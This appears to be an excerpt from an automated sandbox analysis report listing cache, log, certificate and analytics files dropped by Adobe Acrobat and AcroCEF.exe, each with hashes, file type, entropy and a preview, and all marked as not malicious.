                                                                SHA-512:A5BCEAABC12235603A41BAC4198027C5183D240D9EC767DE78420A1D0161E7D183F8B9F6595AFB50E72C6B931BD2C917193D1A41F015DFE6FFD09E8B38409CAB
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:_.U......................................;...{...8...|... ...{s.......... ...{s.. ...{s.P.... ...{s...................7..8...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.1944382312819775
                                                                Encrypted:false
                                                                SSDEEP:6:7WGuPlyq2PCHhJ2nKuAl9OmbnIFUt8OWGUJoz1Zmw+OWGUJolRkwOCHhJ2nKuAlz:7WGXvBHAahFUt8OWGUY1/+OWGUq56HAR
                                                                MD5:5E267CD68EA7C9D1A5F4DF2BDC42542F
                                                                SHA1:B23FCDF1C5BD1DA8EBEC6F3D2A46F855A685601E
                                                                SHA-256:36CFBF07224309D58B3DEE72711ED3EC5C27BEED43FCC842AD34E8C3ED568119
                                                                SHA-512:DD8E727281EAFBE1B07956D61964075A57E48C0D518022E312AEAA8BC112C8CBDDF0F68DDFD2DB063244A75FD790951E9F49E2AF6AEB57AA37E46D1FF7AAEDE4
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.064 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-05:56:26.106 1c50 Recovering log #3.2024/12/19-05:56:26.106 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.1944382312819775
                                                                Encrypted:false
                                                                SSDEEP:6:7WGuPlyq2PCHhJ2nKuAl9OmbnIFUt8OWGUJoz1Zmw+OWGUJolRkwOCHhJ2nKuAlz:7WGXvBHAahFUt8OWGUY1/+OWGUq56HAR
                                                                MD5:5E267CD68EA7C9D1A5F4DF2BDC42542F
                                                                SHA1:B23FCDF1C5BD1DA8EBEC6F3D2A46F855A685601E
                                                                SHA-256:36CFBF07224309D58B3DEE72711ED3EC5C27BEED43FCC842AD34E8C3ED568119
                                                                SHA-512:DD8E727281EAFBE1B07956D61964075A57E48C0D518022E312AEAA8BC112C8CBDDF0F68DDFD2DB063244A75FD790951E9F49E2AF6AEB57AA37E46D1FF7AAEDE4
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.064 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-05:56:26.106 1c50 Recovering log #3.2024/12/19-05:56:26.106 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):338
                                                                Entropy (8bit):5.205736724014408
                                                                Encrypted:false
                                                                SSDEEP:6:7WGBAVq2PCHhJ2nKuAl9Ombzo2jMGIFUt8OWG4bZAgZmw+OWG4bZAIkwOCHhJ2ng:7WGivBHAa8uFUt8OWG4//+OWG4t56HAv
                                                                MD5:0FFF611C52CE292027768CF3290D11D3
                                                                SHA1:D0BB059AF2A4FFEA178B09128EA20F1DD6F286AA
                                                                SHA-256:6C56CDD7BE75A0C98CF824E1444EDFA8D2EFE61F1712E6CB3310FA09964C9D19
                                                                SHA-512:8FB3A4B27A11953477D765B4C70268D4D8CE3BDC554550F6F2CB09D4C51368763919EAC97D240D097FEAF2C9F3E6435BAF4BA519E98F7266AB791D95C835C8FD
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.319 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-05:56:26.321 1d40 Recovering log #3.2024/12/19-05:56:26.321 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):338
                                                                Entropy (8bit):5.205736724014408
                                                                Encrypted:false
                                                                SSDEEP:6:7WGBAVq2PCHhJ2nKuAl9Ombzo2jMGIFUt8OWG4bZAgZmw+OWG4bZAIkwOCHhJ2ng:7WGivBHAa8uFUt8OWG4//+OWG4t56HAv
                                                                MD5:0FFF611C52CE292027768CF3290D11D3
                                                                SHA1:D0BB059AF2A4FFEA178B09128EA20F1DD6F286AA
                                                                SHA-256:6C56CDD7BE75A0C98CF824E1444EDFA8D2EFE61F1712E6CB3310FA09964C9D19
                                                                SHA-512:8FB3A4B27A11953477D765B4C70268D4D8CE3BDC554550F6F2CB09D4C51368763919EAC97D240D097FEAF2C9F3E6435BAF4BA519E98F7266AB791D95C835C8FD
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.319 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-05:56:26.321 1d40 Recovering log #3.2024/12/19-05:56:26.321 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.963247713778661
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                MD5:D46529E824E6E834D0D750C5560C136C
                                                                SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.963247713778661
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                MD5:D46529E824E6E834D0D750C5560C136C
                                                                SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):475
                                                                Entropy (8bit):4.963247713778661
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                MD5:D46529E824E6E834D0D750C5560C136C
                                                                SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:JSON data
                                                                Category:modified
                                                                Size (bytes):475
                                                                Entropy (8bit):4.962073186358444
                                                                Encrypted:false
                                                                SSDEEP:12:YH/um3RA8sqYhsBdOg2H9Ocaq3QYiub6P7E4TX:Y2sRdsfydMHn3QYhbS7n7
                                                                MD5:AD6C1C7A3161F86BCC1B8EDC92E4C1CB
                                                                SHA1:3E07136DD090AC01E4A3CFEE5460F5AACE123A88
                                                                SHA-256:4847C303D49FE26A7A10A1B5AC182990C356B8515CEB53817CE7C026FAEDCCB7
                                                                SHA-512:3363D457B7FA48172EB23A7DC4720F39E61871EF48361A6F44A60C1301C14EDB0F1A898494B839776623D715B93F2793F52EE41A18728936D233F706C485EEB9
                                                                Malicious:false
                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379165796271166","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":637268},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):3878
                                                                Entropy (8bit):5.231629463684699
                                                                Encrypted:false
                                                                SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bWGENL:S43C4mS7fFi0KFYDjr3LWO3V3aw+bWGC
                                                                MD5:7D1EC56CDA1C3C63DE95A8519A97801F
                                                                SHA1:2BE720BA1199DF7A85A6B82467D9FB0BB3125EE1
                                                                SHA-256:FB5E6C1A81C827FB85881CA1E142CBA2DB677F9ECB05B56D78F6AC3B4DB24DF7
                                                                SHA-512:895AF515AFE7BFFC37A980DC236AAE24C80AA63DC5B682292A4642FD55AD363A47D2BCE35A2BC19C0BA24423A360A276B209F830A084884E9A6FF36960831C56
                                                                Malicious:false
                                                                Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):5.216957386320822
                                                                Encrypted:false
                                                                SSDEEP:6:7WGqvUVNAVq2PCHhJ2nKuAl9OmbzNMxIFUt8OWGHIAgZmw+OWGsFAIkwOCHhJ2nv:7WGK1vBHAa8jFUt8OWG6/+OWGst56HAo
                                                                MD5:3A85E5A07E0025E293080B8F3D632E59
                                                                SHA1:1849B0B5F9889B29592CA2AC0FAF0597EB473599
                                                                SHA-256:7EB86DB920B7FE927724192BA831DAE225BAD9736A22A8E8ED4B0E5582BFEA9B
                                                                SHA-512:CD74AA6EE4D7F5373CE1AE55F16F1D38A4853D591EDEF7BD7625913F48F5B1A416D25C405D7026DBD25D4302297CC41E2DC810B433CB3523336E90D0EEB3D70B
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.520 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-05:56:26.536 1d40 Recovering log #3.2024/12/19-05:56:26.541 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):5.216957386320822
                                                                Encrypted:false
                                                                SSDEEP:6:7WGqvUVNAVq2PCHhJ2nKuAl9OmbzNMxIFUt8OWGHIAgZmw+OWGsFAIkwOCHhJ2nv:7WGK1vBHAa8jFUt8OWG6/+OWGst56HAo
                                                                MD5:3A85E5A07E0025E293080B8F3D632E59
                                                                SHA1:1849B0B5F9889B29592CA2AC0FAF0597EB473599
                                                                SHA-256:7EB86DB920B7FE927724192BA831DAE225BAD9736A22A8E8ED4B0E5582BFEA9B
                                                                SHA-512:CD74AA6EE4D7F5373CE1AE55F16F1D38A4853D591EDEF7BD7625913F48F5B1A416D25C405D7026DBD25D4302297CC41E2DC810B433CB3523336E90D0EEB3D70B
                                                                Malicious:false
                                                                Preview:2024/12/19-05:56:26.520 1d40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-05:56:26.536 1d40 Recovering log #3.2024/12/19-05:56:26.541 1d40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                Category:dropped
                                                                Size (bytes):65110
                                                                Entropy (8bit):0.6376462682686903
                                                                Encrypted:false
                                                                SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                Malicious:false
                                                                Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:Certificate, Version=3
                                                                Category:dropped
                                                                Size (bytes):1391
                                                                Entropy (8bit):7.705940075877404
                                                                Encrypted:false
                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                Malicious:false
                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):71954
                                                                Entropy (8bit):7.996617769952133
                                                                Encrypted:true
                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                Malicious:false
                                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):192
                                                                Entropy (8bit):2.756901573172974
                                                                Encrypted:false
                                                                SSDEEP:3:kkFkl99PNvfllXlE/HT8khK/JtNNX8RolJuRdxLlGB9lQRYwpDdt:kKAmT8oaRNMa8RdWBwRd
                                                                MD5:127BF83D54CF5FE4559060B90366A851
                                                                SHA1:5D1840C03B6319DBBC03458EE69F0C6BEB63374E
                                                                SHA-256:BEF446EF4B98AFA5A1ABDA5E656AAD1726851332CFE96D89AFEC7EAEE862BCA3
                                                                SHA-512:69312507975BD7D2A9108E096153053AC81E0436A178EB645251DF277A05D0D418D24800363AA2CF084D4DB3194CAB7DC6DD0345AC1CA45AC6E94C270354DCFF
                                                                Malicious:false
                                                                Preview:p...... ............R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):328
                                                                Entropy (8bit):3.2394988199912076
                                                                Encrypted:false
                                                                SSDEEP:6:kKJVD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:yDImsLNkPlE99SNxAhUe/3
                                                                MD5:73E8B3ECFEF4AA6E34238AF416237273
                                                                SHA1:5D1508AD3976B0261E30731413A507F41FF9D2EC
                                                                SHA-256:E0AEF2C9B17CE6A8C05FA73E54874BDBFA4D0E1BA3857BEB66786F9A8E8810FC
                                                                SHA-512:48A1B38827D8CE8B7FF6B324D006B6137A722A1CE9F87DBF31F2CB3C3E35DB0B7FCA3FBCD44DEEA04A38A53910DFD16B4704928C3E1143D82F4AEE68114B1D7F
                                                                Malicious:false
                                                                Preview:p...... ..........|..R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):295
                                                                Entropy (8bit):5.341503091582143
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJM3g98kUwPeUkwRe9:YvXKXxj+vR/ZwHAQsGMbLUkee9
                                                                MD5:8426C52C16B1D1A351DD0C9F8FB6A687
                                                                SHA1:2EF1401E90051E648ADAC841A21A627BB98EB5B0
                                                                SHA-256:922290C5EC7C12CFBB65E262EEF8FA898DD71F790B815D6E383082570F0BEDF5
                                                                SHA-512:FFB79E1CD65BF2D088E93027B29CDD2243498FDF3AAA44E4F82EB864DC9C61C0DF7D5F53F5BFBAE8FE0E1378FD6A252E2C32109F00F18FBB4017BD34C1627141
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.2783314277409215
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfBoTfXpnrPeUkwRe9:YvXKXxj+vR/ZwHAQsGWTfXcUkee9
                                                                MD5:AA6F334E53391E0BFCE1BD77F26D365B
                                                                SHA1:7E6A2C7861015F19EEE16051AD77ACB60F3CDEF3
                                                                SHA-256:D21B98AAB0E2B14EE046FC77C93BDC846DEF0417156B48AFA31F04B567DC703B
                                                                SHA-512:CF4CE9AEBF3A217DB2F87C90137C587F623642C6AE2EA74155B6A80F1B68065DA2E0F0482700C90D19EFCE8667EE3192B2654E597F7C3F95E6B19FA9EBFDAA15
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):294
                                                                Entropy (8bit):5.2558036769445495
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfBD2G6UpnrPeUkwRe9:YvXKXxj+vR/ZwHAQsGR22cUkee9
                                                                MD5:793E85CDEE88E3DC9A5667E3AC0EF2A3
                                                                SHA1:BDDE44E685CDB4EA9079539453B0DBE20B8A86F1
                                                                SHA-256:F9890376D00C3D9F95C3B333E9703EA518B1ABEC01DBABB18E2CA85DF39EB877
                                                                SHA-512:46ED14D6BDE5A15557DAD4AEAE214C114F00F2F022EBAAACCC2F2DBF543E34D9BB34007F44B4E9BF4FF6ED492A8FFB547963378D90C036FA193E05A1BB426652
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):285
                                                                Entropy (8bit):5.317684610241999
                                                                Encrypted:false
                                                                SSDEEP:6:YEQXJ2HXRVNjeO2vB3/dVlPIHAR0YUDoAvJfPmwrPeUkwRe9:YvXKXxj+vR/ZwHAQsGH56Ukee9
                                                                MD5:99109B8A70A500C6FD57EFEF73DBED19
                                                                SHA1:4AFF3BB385C08D905C371D0D64E5B661ACD41F3F
                                                                SHA-256:388FE3EE42BBBB6C3CC53587361326210D0C3E006DB9119CD952232E44F36D8E
                                                                SHA-512:EDF51680E526C375CC75576F7BFA839BE26F6EFE98C72F3857EEB7A2AFE628C51D822157D8588A4460DF8C87B9430BFBDF49EFFD0AF2F8985356CC05377D79C9
                                                                Malicious:false
                                                                Preview:{"analyticsData":{"responseGUID":"c57d979c-f94e-47c9-9403-b0cd78723709","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734783114626,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):1123
                                                                Entropy (8bit):5.6896792314023745
                                                                Encrypted:false
                                                                SSDEEP:24:Yv6XoJhUpLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:YvZJhUhgy6SAFv5Ah8cv/d
                                                                MD5:ED8E3DC7DFE14E960C8C985BD36BEB29
                                                                SHA1:F54518FD05F1EE1FB0B1B5D90D322DF7343509B9
                                                                SHA-256:971EFC1C99DB1B5CD3F8678C3B6F8C1A4800F49D9258EEBA75D6361F72FB5529
                                                                SHA-512:42859C4D1CBF7718E1813A2104D9E16963B124064935A9D2C164B621AB401F3BF1B73FBBABD35BF8B018340238877AB1C7C2383A6717A6963ABA2ED10BD71546
                                                                Malicious:false
